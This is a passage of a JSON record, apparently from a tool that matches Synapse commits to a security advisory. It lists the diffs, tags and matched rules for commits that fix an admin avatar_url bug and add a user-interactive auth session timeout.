will be incorrect, so instead we create a new exception with just the \"msg\"", - "+ # part.", - "+", - "+ e1.__cause__ = Exception(e.msg)", - "+ e1.__cause__.__cause__ = e.__cause__", - "+ return e1" - ], - "changed_files": [ - "changelog.d/8874.feature", - "synapse/app/homeserver.py", - "synapse/config/_base.py", - "synapse/config/_base.pyi", - "synapse/config/_util.py", - "synapse/config/oidc_config.py", - "synapse/config/password_auth_providers.py", - "synapse/config/repository.py", - "synapse/config/room_directory.py", - "synapse/config/saml2_config.py", - "synapse/config/spam_checker.py", - "synapse/config/third_party_event_rules.py", - "synapse/util/module_loader.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8874": "Default to the blacklisting reserved IP ranges. #8870" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8874, 8874", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: homeserver, server", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8874", - "relevance": 2 - } - ] - }, - { - "commit_id": "ff1f0ee09472b554832fb39952f389d01a4233ac", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607368387, - "hunks": 9, - "message": "Call set_avatar_url with target_user, not user_id (#8872) * Call set_avatar_url with target_user, not user_id Fixes https://github.com/matrix-org/synapse/issues/8871 * Create 8872.bugfix * Update synapse/rest/admin/users.py Co-authored-by: Patrick Cloke * Testing * Update changelog.d/8872.bugfix Co-authored-by: Andrew Morgan <1342360+anoadragon453@users.noreply.github.com> Co-authored-by: Patrick Cloke Co-authored-by: Andrew Morgan <1342360+anoadragon453@users.noreply.github.com>", - "diff": [ - "diff --git a/changelog.d/8872.bugfix b/changelog.d/8872.bugfix", - "new file mode 100644", - "index 000000000..ed00b70a0", - "--- /dev/null", - "+++ b/changelog.d/8872.bugfix", - "@@ -0,0 +1 @@", - "+Fix a bug where `PUT /_synapse/admin/v2/users/` failed to create a new user when `avatar_url` is specified. Bug introduced in Synapse v1.9.0.", - "diff --git a/synapse/rest/admin/users.py b/synapse/rest/admin/users.py", - "index 90940ff18..88cba369f 100644", - "--- a/synapse/rest/admin/users.py", - "+++ b/synapse/rest/admin/users.py", - "@@ -322,5 +322,5 @@ class UserRestServletV2(RestServlet):", - "- if \"avatar_url\" in body and type(body[\"avatar_url\"]) == str:", - "+ if \"avatar_url\" in body and isinstance(body[\"avatar_url\"], str):", - " await self.profile_handler.set_avatar_url(", - "- user_id, requester, body[\"avatar_url\"], True", - "+ target_user, requester, body[\"avatar_url\"], True", - " )", - "diff --git a/tests/rest/admin/test_user.py b/tests/rest/admin/test_user.py", - "index 35c546aa6..ba1438cdc 100644", - "--- a/tests/rest/admin/test_user.py", - "+++ b/tests/rest/admin/test_user.py", - "@@ -563,3 +563,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " \"threepids\": [{\"medium\": \"email\", \"address\": \"bob@bob.bob\"}],", - "- \"avatar_url\": None,", - "+ \"avatar_url\": \"mxc://fibble/wibble\",", - " }", - "@@ -580,2 +580,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " self.assertEqual(True, channel.json_body[\"admin\"])", - "+ self.assertEqual(\"mxc://fibble/wibble\", channel.json_body[\"avatar_url\"])", - "@@ -594,2 +595,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " self.assertEqual(False, channel.json_body[\"deactivated\"])", - "+ self.assertEqual(\"mxc://fibble/wibble\", channel.json_body[\"avatar_url\"])", - "@@ -608,2 +610,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " \"threepids\": [{\"medium\": \"email\", \"address\": \"bob@bob.bob\"}],", - "+ \"avatar_url\": \"mxc://fibble/wibble\",", - " }", - "@@ -624,2 +627,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " self.assertEqual(False, channel.json_body[\"admin\"])", - "+ self.assertEqual(\"mxc://fibble/wibble\", channel.json_body[\"avatar_url\"])", - "@@ -638,2 +642,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " self.assertEqual(False, channel.json_body[\"deactivated\"])", - "+ self.assertEqual(\"mxc://fibble/wibble\", channel.json_body[\"avatar_url\"])" - ], - "changed_files": [ - "changelog.d/8872.bugfix", - "synapse/rest/admin/users.py", - "tests/rest/admin/test_user.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8872": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8872, 8872", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: issue", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8872", - "relevance": 2 - } - ] - }, - { - "commit_id": "5d4c330ed979b0d60efe5f80fd76de8f162263a1", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608294837, - "hunks": 41, - "message": "Allow re-using a UI auth validation for a period of time (#8970)", - "diff": [ - "diff --git a/changelog.d/8970.feature b/changelog.d/8970.feature", - "new file mode 100644", - "index 000000000..6d5b3303a", - "--- /dev/null", - "+++ b/changelog.d/8970.feature", - "@@ -0,0 +1 @@", - "+Allow re-using an user-interactive authentication session for a period of time.", - "diff --git a/docs/sample_config.yaml b/docs/sample_config.yaml", - "index 75a01094d..549c581a9 100644", - "--- a/docs/sample_config.yaml", - "+++ b/docs/sample_config.yaml", - "@@ -2070,2 +2070,17 @@ password_config:", - "+ui_auth:", - "+ # The number of milliseconds to allow a user-interactive authentication", - "+ # session to be active.", - "+ #", - "+ # This defaults to 0, meaning the user is queried for their credentials", - "+ # before every action, but this can be overridden to alow a single", - "+ # validation to be re-used. This weakens the protections afforded by", - "+ # the user-interactive authentication process, by allowing for multiple", - "+ # (and potentially different) operations to use the same validation session.", - "+ #", - "+ # Uncomment below to allow for credential validation to last for 15", - "+ # seconds.", - "+ #", - "+ #session_timeout: 15000", - "+", - "diff --git a/synapse/config/_base.pyi b/synapse/config/_base.pyi", - "index ed26e2fb6..29aa064e5 100644", - "--- a/synapse/config/_base.pyi", - "+++ b/synapse/config/_base.pyi", - "@@ -5,2 +5,3 @@ from synapse.config import (", - " appservice,", - "+ auth,", - " captcha,", - "@@ -16,3 +17,2 @@ from synapse.config import (", - " oidc_config,", - "- password,", - " password_auth_providers,", - "@@ -67,3 +67,3 @@ class RootConfig:", - " jwt: jwt_config.JWTConfig", - "- password: password.PasswordConfig", - "+ auth: auth.AuthConfig", - " email: emailconfig.EmailConfig", - "diff --git a/synapse/config/auth.py b/synapse/config/auth.py", - "new file mode 100644", - "index 000000000..2b3e2ce87", - "--- /dev/null", - "+++ b/synapse/config/auth.py", - "@@ -0,0 +1,110 @@", - "+# -*- coding: utf-8 -*-", - "+# Copyright 2015, 2016 OpenMarket Ltd", - "+# Copyright 2020 The Matrix.org Foundation C.I.C.", - "+#", - "+# Licensed under the Apache License, Version 2.0 (the \"License\");", - "+# you may not use this file except in compliance with the License.", - "+# You may obtain a copy of the License at", - "+#", - "+# http://www.apache.org/licenses/LICENSE-2.0", - "+#", - "+# Unless required by applicable law or agreed to in writing, software", - "+# distributed under the License is distributed on an \"AS IS\" BASIS,", - "+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+# See the License for the specific language governing permissions and", - "+# limitations under the License.", - "+", - "+from ._base import Config", - "+", - "+", - "+class AuthConfig(Config):", - "+ \"\"\"Password and login configuration", - "+ \"\"\"", - "+", - "+ section = \"auth\"", - "+", - "+ def read_config(self, config, **kwargs):", - "+ password_config = config.get(\"password_config\", {})", - "+ if password_config is None:", - "+ password_config = {}", - "+", - "+ self.password_enabled = password_config.get(\"enabled\", True)", - "+ self.password_localdb_enabled = password_config.get(\"localdb_enabled\", True)", - "+ self.password_pepper = password_config.get(\"pepper\", \"\")", - "+", - "+ # Password policy", - "+ self.password_policy = password_config.get(\"policy\") or {}", - "+ self.password_policy_enabled = self.password_policy.get(\"enabled\", False)", - "+", - "+ # User-interactive authentication", - "+ ui_auth = config.get(\"ui_auth\") or {}", - "+ self.ui_auth_session_timeout = ui_auth.get(\"session_timeout\", 0)", - "+", - "+ def generate_config_section(self, config_dir_path, server_name, **kwargs):", - "+ return \"\"\"\\", - "+ password_config:", - "+ # Uncomment to disable password login", - "+ #", - "+ #enabled: false", - "+", - "+ # Uncomment to disable authentication against the local password", - "+ # database. This is ignored if `enabled` is false, and is only useful", - "+ # if you have other password_providers.", - "+ #", - "+ #localdb_enabled: false", - "+", - "+ # Uncomment and change to a secret random string for extra security.", - "+ # DO NOT CHANGE THIS AFTER INITIAL SETUP!", - "+ #", - "+ #pepper: \"EVEN_MORE_SECRET\"", - "+", - "+ # Define and enforce a password policy. Each parameter is optional.", - "+ # This is an implementation of MSC2000.", - "+ #", - "+ policy:", - "+ # Whether to enforce the password policy.", - "+ # Defaults to 'false'.", - "+ #", - "+ #enabled: true", - "+", - "+ # Minimum accepted length for a password.", - "+ # Defaults to 0.", - "+ #", - "+ #minimum_length: 15", - "+", - "+ # Whether a password must contain at least one digit.", - "+ # Defaults to 'false'.", - "+ #", - "+ #require_digit: true", - "+", - "+ # Whether a password must contain at least one symbol.", - "+ # A symbol is any character that's not a number or a letter.", - "+ # Defaults to 'false'.", - "+ #", - "+ #require_symbol: true", - "+", - "+ # Whether a password must contain at least one lowercase letter.", - "+ # Defaults to 'false'.", - "+ #", - "+ #require_lowercase: true", - "+", - "+ # Whether a password must contain at least one lowercase letter.", - "+ # Defaults to 'false'.", - "+ #", - "+ #require_uppercase: true", - "+", - "+ ui_auth:", - "+ # The number of milliseconds to allow a user-interactive authentication", - "+ # session to be active.", - "+ #", - "+ # This defaults to 0, meaning the user is queried for their credentials", - "+ # before every action, but this can be overridden to alow a single", - "+ # validation to be re-used. This weakens the protections afforded by", - "+ # the user-interactive authentication process, by allowing for multiple", - "+ # (and potentially different) operations to use the same validation session.", - "+ #", - "+ # Uncomment below to allow for credential validation to last for 15", - "+ # seconds.", - "+ #", - "+ #session_timeout: 15000", - "+ \"\"\"", - "diff --git a/synapse/config/homeserver.py b/synapse/config/homeserver.py", - "index be6555452..4bd2b3587 100644", - "--- a/synapse/config/homeserver.py", - "+++ b/synapse/config/homeserver.py", - "@@ -19,2 +19,3 @@ from .api import ApiConfig", - " from .appservice import AppServiceConfig", - "+from .auth import AuthConfig", - " from .cache import CacheConfig", - "@@ -32,3 +33,2 @@ from .metrics import MetricsConfig", - " from .oidc_config import OIDCConfig", - "-from .password import PasswordConfig", - " from .password_auth_providers import PasswordAuthProviderConfig", - "@@ -78,3 +78,3 @@ class HomeServerConfig(RootConfig):", - " JWTConfig,", - "- PasswordConfig,", - "+ AuthConfig,", - " EmailConfig,", - "diff --git a/synapse/handlers/auth.py b/synapse/handlers/auth.py", - "index 57ff461f9..f4434673d 100644", - "--- a/synapse/handlers/auth.py", - "+++ b/synapse/handlers/auth.py", - "@@ -228,2 +228,5 @@ class AuthHandler(BaseHandler):", - "+ # The number of seconds to keep a UI auth session active.", - "+ self._ui_auth_session_timeout = hs.config.ui_auth_session_timeout", - "+", - " # Ratelimitier for failed /login attempts", - "@@ -285,3 +288,3 @@ class AuthHandler(BaseHandler):", - " description: str,", - "- ) -> Tuple[dict, str]:", - "+ ) -> Tuple[dict, Optional[str]]:", - " \"\"\"", - "@@ -312,3 +315,4 @@ class AuthHandler(BaseHandler):", - " 'session_id' is the ID of this session, either passed in by the", - "- client or assigned by this call", - "+ client or assigned by this call. This is None if UI auth was", - "+ skipped (by re-using a previous validation).", - "@@ -326,2 +330,12 @@ class AuthHandler(BaseHandler):", - "+ if self._ui_auth_session_timeout:", - "+ last_validated = await self.store.get_access_token_last_validated(", - "+ requester.access_token_id", - "+ )", - "+ if self.clock.time_msec() - last_validated < self._ui_auth_session_timeout:", - "+ # Return the input parameters, minus the auth key, which matches", - "+ # the logic in check_ui_auth.", - "+ request_body.pop(\"auth\", None)", - "+ return request_body, None", - "+", - " user_id = requester.user.to_string()", - "@@ -361,2 +375,5 @@ class AuthHandler(BaseHandler):", - "+ # Note that the access token has been validated.", - "+ await self.store.update_access_token_last_validated(requester.access_token_id)", - "+", - " return params, session_id", - "@@ -454,9 +471,6 @@ class AuthHandler(BaseHandler):", - "- authdict = None", - " sid = None # type: Optional[str]", - "- if clientdict and \"auth\" in clientdict:", - "- authdict = clientdict[\"auth\"]", - "- del clientdict[\"auth\"]", - "- if \"session\" in authdict:", - "- sid = authdict[\"session\"]", - "+ authdict = clientdict.pop(\"auth\", {})", - "+ if \"session\" in authdict:", - "+ sid = authdict[\"session\"]", - "@@ -565,2 +579,4 @@ class AuthHandler(BaseHandler):", - " for f in flows:", - "+ # If all the required credentials have been supplied, the user has", - "+ # successfully completed the UI auth process!", - " if len(set(f) - set(creds)) == 0:", - "diff --git a/synapse/rest/client/v2_alpha/account.py b/synapse/rest/client/v2_alpha/account.py", - "index eebee44a4..d837bde1d 100644", - "--- a/synapse/rest/client/v2_alpha/account.py", - "+++ b/synapse/rest/client/v2_alpha/account.py", - "@@ -256,7 +256,7 @@ class PasswordRestServlet(RestServlet):", - "- # If we have a password in this request, prefer it. Otherwise, there", - "- # must be a password hash from an earlier request.", - "+ # If we have a password in this request, prefer it. Otherwise, use the", - "+ # password hash from an earlier request.", - " if new_password:", - " password_hash = await self.auth_handler.hash(new_password)", - "- else:", - "+ elif session_id is not None:", - " password_hash = await self.auth_handler.get_session_data(", - "@@ -264,2 +264,6 @@ class PasswordRestServlet(RestServlet):", - " )", - "+ else:", - "+ # UI validation was skipped, but the request did not include a new", - "+ # password.", - "+ password_hash = None", - " if not password_hash:", - "diff --git a/synapse/storage/databases/main/registration.py b/synapse/storage/databases/main/registration.py", - "index ff96c34c2..8d05288ed 100644", - "--- a/synapse/storage/databases/main/registration.py", - "+++ b/synapse/storage/databases/main/registration.py", - "@@ -945,2 +945,38 @@ class RegistrationWorkerStore(CacheInvalidationWorkerStore):", - "+ async def get_access_token_last_validated(self, token_id: int) -> int:", - "+ \"\"\"Retrieves the time (in milliseconds) of the last validation of an access token.", - "+", - "+ Args:", - "+ token_id: The ID of the access token to update.", - "+ Raises:", - "+ StoreError if the access token was not found.", - "+", - "+ Returns:", - "+ The last validation time.", - "+ \"\"\"", - "+ result = await self.db_pool.simple_select_one_onecol(", - "+ \"access_tokens\", {\"id\": token_id}, \"last_validated\"", - "+ )", - "+", - "+ # If this token has not been validated (since starting to track this),", - "+ # return 0 instead of None.", - "+ return result or 0", - "+", - "+ async def update_access_token_last_validated(self, token_id: int) -> None:", - "+ \"\"\"Updates the last time an access token was validated.", - "+", - "+ Args:", - "+ token_id: The ID of the access token to update.", - "+ Raises:", - "+ StoreError if there was a problem updating this.", - "+ \"\"\"", - "+ now = self._clock.time_msec()", - "+", - "+ await self.db_pool.simple_update_one(", - "+ \"access_tokens\",", - "+ {\"id\": token_id},", - "+ {\"last_validated\": now},", - "+ desc=\"update_access_token_last_validated\",", - "+ )", - "+", - "@@ -1152,2 +1188,3 @@ class RegistrationStore(StatsStore, RegistrationBackgroundUpdateStore):", - " next_id = self._access_tokens_id_gen.get_next()", - "+ now = self._clock.time_msec()", - "@@ -1162,2 +1199,3 @@ class RegistrationStore(StatsStore, RegistrationBackgroundUpdateStore):", - " \"puppets_user_id\": puppets_user_id,", - "+ \"last_validated\": now,", - " },", - "diff --git a/synapse/storage/databases/main/schema/delta/58/26access_token_last_validated.sql b/synapse/storage/databases/main/schema/delta/58/26access_token_last_validated.sql", - "new file mode 100644", - "index 000000000..1a101cd5e", - "--- /dev/null", - "+++ b/synapse/storage/databases/main/schema/delta/58/26access_token_last_validated.sql", - "@@ -0,0 +1,18 @@", - "+/* Copyright 2020 The Matrix.org Foundation C.I.C", - "+ *", - "+ * Licensed under the Apache License, Version 2.0 (the \"License\");", - "+ * you may not use this file except in compliance with the License.", - "+ * You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+-- The last time this access token was \"validated\" (i.e. logged in or succeeded", - "+-- at user-interactive authentication).", - "+ALTER TABLE access_tokens ADD COLUMN last_validated BIGINT;", - "diff --git a/tests/rest/client/v2_alpha/test_auth.py b/tests/rest/client/v2_alpha/test_auth.py", - "index 51323b3da..ac66a4e0b 100644", - "--- a/tests/rest/client/v2_alpha/test_auth.py", - "+++ b/tests/rest/client/v2_alpha/test_auth.py", - "@@ -15,3 +15,3 @@", - "-from typing import List, Union", - "+from typing import Union", - "@@ -179,9 +179,4 @@ class UIAuthTests(unittest.HomeserverTestCase):", - " self.user = self.register_user(\"test\", self.user_pass)", - "- self.user_tok = self.login(\"test\", self.user_pass)", - "-", - "- def get_device_ids(self, access_token: str) -> List[str]:", - "- # Get the list of devices so one can be deleted.", - "- channel = self.make_request(\"GET\", \"devices\", access_token=access_token,)", - "- self.assertEqual(channel.code, 200)", - "- return [d[\"device_id\"] for d in channel.json_body[\"devices\"]]", - "+ self.device_id = \"dev1\"", - "+ self.user_tok = self.login(\"test\", self.user_pass, self.device_id)", - "@@ -221,7 +216,5 @@ class UIAuthTests(unittest.HomeserverTestCase):", - " \"\"\"", - "- device_id = self.get_device_ids(self.user_tok)[0]", - "-", - " # Attempt to delete this device.", - " # Returns a 401 as per the spec", - "- channel = self.delete_device(self.user_tok, device_id, 401)", - "+ channel = self.delete_device(self.user_tok, self.device_id, 401)", - "@@ -235,3 +228,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", - " self.user_tok,", - "- device_id,", - "+ self.device_id,", - " 200,", - "@@ -254,4 +247,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", - "- device_id = self.get_device_ids(self.user_tok)[0]", - "- channel = self.delete_device(self.user_tok, device_id, 401)", - "+ channel = self.delete_device(self.user_tok, self.device_id, 401)", - " session = channel.json_body[\"session\"]", - "@@ -261,3 +253,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", - " self.user_tok,", - "- device_id,", - "+ self.device_id,", - " 200,", - "@@ -284,6 +276,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", - " # Create a second login.", - "- self.login(\"test\", self.user_pass)", - "-", - "- device_ids = self.get_device_ids(self.user_tok)", - "- self.assertEqual(len(device_ids), 2)", - "+ self.login(\"test\", self.user_pass, \"dev2\")", - "@@ -291,3 +280,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", - " # Returns a 401 as per the spec", - "- channel = self.delete_devices(401, {\"devices\": [device_ids[0]]})", - "+ channel = self.delete_devices(401, {\"devices\": [self.device_id]})", - "@@ -303,3 +292,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", - " {", - "- \"devices\": [device_ids[1]],", - "+ \"devices\": [\"dev2\"],", - " \"auth\": {", - "@@ -318,6 +307,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", - " # Create a second login.", - "- self.login(\"test\", self.user_pass)", - "-", - "- device_ids = self.get_device_ids(self.user_tok)", - "- self.assertEqual(len(device_ids), 2)", - "+ self.login(\"test\", self.user_pass, \"dev2\")", - "@@ -325,3 +311,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", - " # Returns a 401 as per the spec", - "- channel = self.delete_device(self.user_tok, device_ids[0], 401)", - "+ channel = self.delete_device(self.user_tok, self.device_id, 401)", - "@@ -334,5 +320,7 @@ class UIAuthTests(unittest.HomeserverTestCase):", - " # second device. This results in an error.", - "+ #", - "+ # This makes use of the fact that the device ID is embedded into the URL.", - " self.delete_device(", - " self.user_tok,", - "- device_ids[1],", 